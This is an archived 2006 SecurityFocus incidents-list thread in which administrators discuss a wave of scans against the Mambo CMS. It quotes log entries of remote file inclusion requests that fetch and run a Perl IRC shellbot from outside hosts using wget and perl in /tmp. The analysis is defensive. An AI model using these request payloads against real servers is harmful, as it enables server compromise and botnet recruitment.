Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
Incidents
High volume of Mambo scans May 13 2006 01:36PM
Daniel Cid (danielcid yahoo com br) (4 replies)
Re: High volume of Mambo scans May 15 2006 03:01AM
Karl Schlitt (karl dakota-st com)
Re: High volume of Mambo scans May 15 2006 12:24AM
George A. Theall (theall tifaware com)
Re: High volume of Mambo scans May 14 2006 11:43PM
Peter Kosinar (goober ksp sk)
Re: High volume of Mambo scans May 14 2006 10:57PM
Jamie Riden (jamesr europe com)
Looks like some sort of shellbot wanting to connect to an IRC channel
#abusers on abuser.hacked.in:8080.

I've been seeing occaisonal probes for Mambo's index.php on and off
for a while now - the first part is similar to
http://nz-honeynet.org/papers/mambo-exploit-obfuscated.pdf but the
payloads are slightly different, though it always seems to end up with
an IRC bot of some kind.

I usually see them coupled with scans for coppermine and other remote
include issues, plus xmlrpc probes.

I think you're seeing an attempt to exploit issue#3 here -
http://secunia.com/advisories/18935/

cheers,
Jamie

On 14/05/06, Daniel Cid <danielcid (at) yahoo.com (dot) br [email concealed]> wrote:
> Since Thursday night I'm seeing a high volume of scans
> on different web servers for possibly the following
> vulns:
>
> http://secunia.com/advisories/14337/
> http://www.osvdb.org/displayvuln.php?osvdb_id=10180
>
>
> However, they say the problem is on function.php and
> I'm seeing them on index.php. Can anyone confirm that?
>
> Some log samples:
>
> 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wge
t%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xenton
ix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20ht
tp://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"
> 212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET
> /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosC
onfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;w
get%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%
20session.*?
> HTTP/1.0" 404 167 "-" "Mozilla/5.0"

--
Jamie Riden / jamesr (at) europe (dot) com [email concealed] / jamie.riden (at) computer (dot) org [email concealed]
NZ Honeynet project - http://www.nz-honeynet.org/

[ reply ]




 

Privacy Statement
Copyright 2009, SecurityFocus